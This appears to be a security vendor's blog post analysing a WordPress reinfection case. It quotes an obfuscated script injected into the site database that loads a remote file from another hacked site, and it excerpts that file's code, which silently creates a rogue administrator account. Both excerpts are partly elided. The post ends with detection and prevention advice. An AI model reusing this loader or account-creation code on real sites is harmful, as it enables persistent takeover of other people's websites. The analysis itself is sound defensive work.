The Hacker Returns: A Backdoor Edition

Once an attacker manages to hack and gain access to a target site or system, they typically work hard to maintain their access—as long as it can to help them achieve their goals.

You can think of it like having an annoying party-crasher at your pool party who decides to stick around uninvited, hiding out somewhere and using all of your stuff.

In a large majority of hacked sites, attackers often plant and place something called a backdoor. These backdoors allow them to continue accessing compromised systems, even if the original infection gets cleaned. The backdoor is placed and hidden somewhere inconspicuous to allow the hacker to bypass the normal authentication process.

Backdoors: Re-entry Points to Compromised Environments

While some backdoors exist in the form of malicious users—where the hacker creates a rogue site administrator—others can completely bypass login mechanisms by sending a specific request to the website. Since this type of backdoor offers a direct entry point into the system, the hacker can get into the site’s control panel and have full access over their content whenever they want.

Backdoors can perform specific tasks as well, such as creating fake and malicious administrator users, also allowing attackers to maintain full access over the site for longer periods of time.

Website Reinfection & Symptoms After Cleanup

During a recent remediation request, a site owner complained of their site displaying strange activity. A variety of symptoms were found that indicated malicious behavior: the site owner saw spam posts had been  published on their website, unrecognizable admin users had been created, and unwanted advertisements and popups that they had never placed or used on the site were displayed to visitors.

To make matters worse, every time they tried to clean and remove the infection from the website, the symptoms kept returning.

After reviewing their files and database, we found this malicious JavaScript code hiding in the wp_options table:

<script>var sc = document.createElement(String.fromCharCode(115, 99, 114, 105, 112, 116)); sc.src=String.fromCharCode(104, 116, 116, 112, 58, 47,SKIP…………...SKIP…………………..SKIP………….46, 99, 111, 109, 47, 119, 112, 45, 105, 110, 99, 108, 117, 100, 101, 115, 47, 106, 115, 47, 121, 101, 115, 98, 97, 98, 121, 46, 106, 115); sc.type = String.fromCharCode(116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116); document.getElementsByTagName(String.fromCharCode(104, 101, 97, 100))[0].appendChild(sc);</script>

This JavaScript code loads and executes a script from a file hosted remotely on another hacked victims site: hxxp://other_victim.com/wp-includes/js/yesbaby.js

Remote File Details

The content of the remote file yesbaby.js includes:

var domain = location.protocol+'//'+document.domain;

var url = domain+'/wp-admin/user-new.php';

var JQ = jQuery.noConflict();

JQ.ajax({

"url": url,

"success" : function(x){

….

….

….

//SKIP

//SKIP

//SKIP

….

….

….

console.log('Registering, User: echoll, Pass: sikerim, Role: Admin ');

JQ.ajax({

"url": url,

"method" : "POST",

"data" :

{ "action":"createuser",

"_wpnonce_create-user": nonce,

"_wp_http_referer" : "/wp-admin/user-new.php",

"user_login": "echoll",

"email" : "echoll9881454554@gmail.com",

"first_name" : "loli",

"last_name" : "loli",

"url" : "http://google.com/",

"pass1" : "sikerim",

"pass1-text" : "sikerim",

"pass2" : "sikerim",

"send_user_notification" : 0,

"role":"administrator",

"createuser" : "Add+New+User"

},

"success" : function(x){

console.log("Register done");

}

});

}

});

This malicious remote JavaScript file is called with every site load. It creates an admin user called “echoll” with the pass “sikerim”, along with other details as specified by the hacker. This essentially provides them with full access to the compromised environment.

Conclusion & Mitigation

Backdoors can be tricky to locate and remove—especially if bad actors have concealed more than one of them within a website’s environment.

To detect backdoors and other security threats, we encourage website owners to implement a file integrity monitoring solution to monitor core files. If changes, additions, or deletions to the environment are detected, you’ll be notified immediately.

The best solution to mitigate backdoors is to prevent them from being planted on your website in the first place. Use complex passwords, keep software and third party components up-to-date with the latest patches, and use a web application firewall to prevent exploits and protect against malware.